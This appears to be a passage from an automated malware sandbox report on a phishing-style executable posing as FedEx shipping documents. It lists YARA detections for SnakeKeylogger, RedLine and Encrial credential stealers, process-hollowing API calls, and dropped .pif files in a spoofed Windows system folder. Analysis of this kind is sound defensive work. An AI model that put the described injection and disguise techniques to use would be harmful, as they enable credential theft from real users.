        Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000E.00000001.1674039682.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000E.00000002.3896243951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 0000000C.00000002.3896211622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 0000000C.00000001.1589020424.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000007.00000001.1451761141.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 00000007.00000002.3896174260.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: initial sampleStatic PE information: Filename: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D642A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02D642A8
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D633F8 NtWriteVirtualMemory,0_2_02D633F8
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D630AC NtAllocateVirtualMemory,0_2_02D630AC
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D696E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02D696E4
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D69600 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02D69600
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D69578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02D69578
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D63BBC NtUnmapViewOfSection,0_2_02D63BBC
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D6394C NtReadVirtualMemory,0_2_02D6394C
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D642A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02D642A6
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D630AA NtAllocateVirtualMemory,0_2_02D630AA
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D69524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02D69524
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_00595CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,9_2_00595CF1
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_005940B1 NtQuerySystemInformation,9_2_005940B1
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_00595D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,9_2_00595D6A
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_00595911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxW,CreateActCtxW,GetModuleHandleW,CreateActCtxW,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,9_2_00595911
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_00594136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,9_2_00594136
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_03053BBC NtUnmapViewOfSection,11_2_03053BBC
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_030533F8 NtWriteVirtualMemory,11_2_030533F8
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_030542A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_030542A8
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_0305394C NtReadVirtualMemory,11_2_0305394C
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_030530AC NtAllocateVirtualMemory,11_2_030530AC
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_030596E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,11_2_030596E4
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_030542A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_030542A6
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_030539E6 NtReadVirtualMemory,11_2_030539E6
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_030530AA NtAllocateVirtualMemory,11_2_030530AA
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_03059600 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,11_2_03059600
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_03059524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_03059524
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_03059578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_03059578
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_03053C48 NtUnmapViewOfSection,11_2_03053C48
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_03053493 NtWriteVirtualMemory,11_2_03053493
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D6AF34 InetIsOffline,Sleep,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02D6AF34
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\WindowsJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \SysWOW64Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile deleted: C:\Windows \SysWOW64\svchost.pifJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D520B40_2_02D520B4
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5CECD0_2_02D5CECD
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5CFC60_2_02D5CFC6
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_00408C607_2_00408C60
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_0040DC117_2_0040DC11
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_00407C3F7_2_00407C3F
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_00418CCC7_2_00418CCC
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_00406CA07_2_00406CA0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004028B07_2_004028B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_0041A4BE7_2_0041A4BE
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004182447_2_00418244
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004016507_2_00401650
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_00402F207_2_00402F20
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004193C47_2_004193C4
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004187887_2_00418788
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_00402F897_2_00402F89
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_00402B907_2_00402B90
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004073A07_2_004073A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939C9807_2_2939C980
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939586A7_2_2939586A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939CC587_2_2939CC58
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939CF307_2_2939CF30
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_29396EA87_2_29396EA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_29392EF87_2_29392EF8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939EEE07_2_2939EEE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939D20A7_2_2939D20A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939A5987_2_2939A598
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939D4EA7_2_2939D4EA
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939C4E07_2_2939C4E0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939D7B87_2_2939D7B8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_293976307_2_29397630
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939EED07_2_2939EED0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_293943117_2_29394311
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2939C6A87_2_2939C6A8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D4351687_2_2D435168
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D439D687_2_2D439D68
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43CDF07_2_2D43CDF0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D4318607_2_2D431860
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D431FB87_2_2D431FB8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D4396987_2_2D439698
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D432AA87_2_2D432AA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43F9527_2_2D43F952
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43F9607_2_2D43F960
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43F5087_2_2D43F508
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43CDE07_2_2D43CDE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D4300407_2_2D430040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43EC497_2_2D43EC49
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D4318507_2_2D431850
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43EC587_2_2D43EC58
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43E8007_2_2D43E800
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D4300337_2_2D430033
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D438CE07_2_2D438CE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43F4F77_2_2D43F4F7
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43F0A07_2_2D43F0A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43F0B07_2_2D43F0B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43DF507_2_2D43DF50
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D430B207_2_2D430B20
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D430B307_2_2D430B30
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43DF3F7_2_2D43DF3F
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43E7F07_2_2D43E7F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43E39A7_2_2D43E39A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43E3A87_2_2D43E3A8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D431FA87_2_2D431FA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43D2487_2_2D43D248
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43D2397_2_2D43D239
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43DAE87_2_2D43DAE8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43DAF87_2_2D43DAF8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43D6907_2_2D43D690
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D432A987_2_2D432A98
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D43D6A07_2_2D43D6A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6294207_2_2D629420
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6264907_2_2D626490
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D627FE07_2_2D627FE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6286407_2_2D628640
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D620D487_2_2D620D48
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62E1207_2_2D62E120
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D620D397_2_2D620D39
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D623D107_2_2D623D10
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62E1117_2_2D62E111
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6215F87_2_2D6215F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62A9C87_2_2D62A9C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6211A07_2_2D6211A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62E5A97_2_2D62E5A9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62A9B77_2_2D62A9B7
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62E5B87_2_2D62E5B8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62C5807_2_2D62C580
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6211907_2_2D621190
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62C5907_2_2D62C590
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6234607_2_2D623460
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62BC607_2_2D62BC60
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62DC787_2_2D62DC78
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6200407_2_2D620040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6234527_2_2D623452
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62BC517_2_2D62BC51
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6260277_2_2D626027
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6260387_2_2D626038
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6200067_2_2D620006
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6230087_2_2D623008
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62F8087_2_2D62F808
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62940F7_2_2D62940F
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62F8187_2_2D62F818
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62C0EA7_2_2D62C0EA
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6268E87_2_2D6268E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6208F07_2_2D6208F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62C0F87_2_2D62C0F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6268D87_2_2D6268D8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6208DF7_2_2D6208DF
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6238A97_2_2D6238A9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62FCB07_2_2D62FCB0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6238B87_2_2D6238B8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6264827_2_2D626482
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6204887_2_2D620488
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62DC887_2_2D62DC88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6204987_2_2D620498
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62F3707_2_2D62F370
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6257787_2_2D625778
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D627B797_2_2D627B79
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6227487_2_2D622748
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62D3487_2_2D62D348
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62D3587_2_2D62D358
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6227587_2_2D622758
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6253227_2_2D625322
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6253307_2_2D625330
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6277307_2_2D627730
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6223007_2_2D622300
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62771F7_2_2D62771F
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D625BE07_2_2D625BE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62D7E07_2_2D62D7E0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62D7F07_2_2D62D7F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D622FF77_2_2D622FF7
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62B7C87_2_2D62B7C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D627FCF7_2_2D627FCF
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D625BD07_2_2D625BD0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D622BA17_2_2D622BA1
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D622BB07_2_2D622BB0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62F3807_2_2D62F380
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6257887_2_2D625788
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D627B887_2_2D627B88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D624A727_2_2D624A72
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D626E707_2_2D626E70
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D621A407_2_2D621A40
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62EA417_2_2D62EA41
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62EA507_2_2D62EA50
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D621A507_2_2D621A50
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62CA287_2_2D62CA28
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62CA187_2_2D62CA18
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62EEE87_2_2D62EEE8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6222F17_2_2D6222F1
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62CEC07_2_2D62CEC0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D624EC77_2_2D624EC7
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6272CA7_2_2D6272CA
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D624ED87_2_2D624ED8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6272D87_2_2D6272D8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62EED97_2_2D62EED9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D621EA87_2_2D621EA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D62CEB07_2_2D62CEB0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D626E807_2_2D626E80
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D624A807_2_2D624A80
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D621E977_2_2D621E97
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D68E0787_2_2D68E078
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6800407_2_2D680040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6803607_2_2D680360
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D687A287_2_2D687A28
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6835607_2_2D683560
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6819407_2_2D681940
